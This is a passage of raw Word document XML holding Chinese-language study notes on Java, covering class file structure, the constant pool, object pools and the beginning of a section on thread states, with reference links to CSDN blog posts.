      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件结构类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言结构，主要包含两种数据类型：</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6293">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>无符号数和表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。无符号数用来表述数字、索引引用以及字符串，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等无符号数，而表示多个无符号数和表组成的符合结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B6CCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>javap -verbose TestClass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看字节码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId126" w:history="1">
        <w:r w:rsidRPr="004365C5">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/zhangjg_blog/article/details/21487287</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DA54D7" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidR="00DC002F" w:rsidRPr="004365C5">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/luanlouis/article/details/40148053</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件基本结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常量池</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="000F33A0" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="94" w:beforeAutospacing="0" w:after="94" w:afterAutospacing="0" w:line="236" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>常量池，</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant_pool</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>是一种表结构</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>它包含</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Class </w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>文件结构及其子结构中引用的所有字符串常量、</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>类或接口名、字段名和其它常量。</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>常量池中的每一项都具备相同的格式特征——第一个字节作为类型标记用于识别该项是哪种类型的常量，称为</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tag byte</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。常量池的索引范围是</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>至</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant_pool_count−1</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。常量池的具体细节我们会稍后讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="000F33A0" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="94" w:beforeAutospacing="0" w:after="94" w:afterAutospacing="0" w:line="236" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>http://blog.csdn.net/luanlouis/article/details/39960815</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象池</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="000F33A0" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="94" w:beforeAutospacing="0" w:after="94" w:afterAutospacing="0" w:line="236" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>对象池技术并没有限制说只能创建一个对象，而且这种技术同样适用于创建固定数量的对象，然而，这种情况下，你就得面对如何共享对象池里的对象这种问题。当创建多个对象会的代价会很大的时候，可以考虑使用对象池技术，目前已有的技术比如</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>线程池技术、数据库连接池技术</w:t>
      </w:r>
      <w:r w:rsidRPr="000F33A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DA54D7" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidR="00DC002F" w:rsidRPr="00881F00">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://javaeyetodj.iteye.com/blog/969635</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF5F17" w:rsidRPr="00DC002F" w:rsidRDefault="00CF5F17" w:rsidP="000A40C2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3D5F" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009F1A82" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="009F1A82" w:rsidRPr="00F41A4C">
        <w:t>多线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A0F26" w:rsidRDefault="00B13670" w:rsidP="005A0F26">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005A0F26" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00961589" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B13670" w:rsidRPr="00B13670" w:rsidRDefault="00B13670" w:rsidP="00E839D1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E934FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>线程状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00198" w:rsidRPr="00B00198" w:rsidRDefault="00B00198" w:rsidP="00B00198">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00B00198">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>中，线程通常有五种状态，创建，就绪，运行、阻塞和死亡状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00198" w:rsidRDefault="00422902" w:rsidP="00514328">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4368706" cy="2960330"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="63" name="图片 4" descr="http://hi.csdn.net/attachment/201109/6/0_13153020572GoC.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hi.csdn.net/attachment/201109/6/0_13153020572GoC.gif"/>
                    <pic:cNvPicPr>
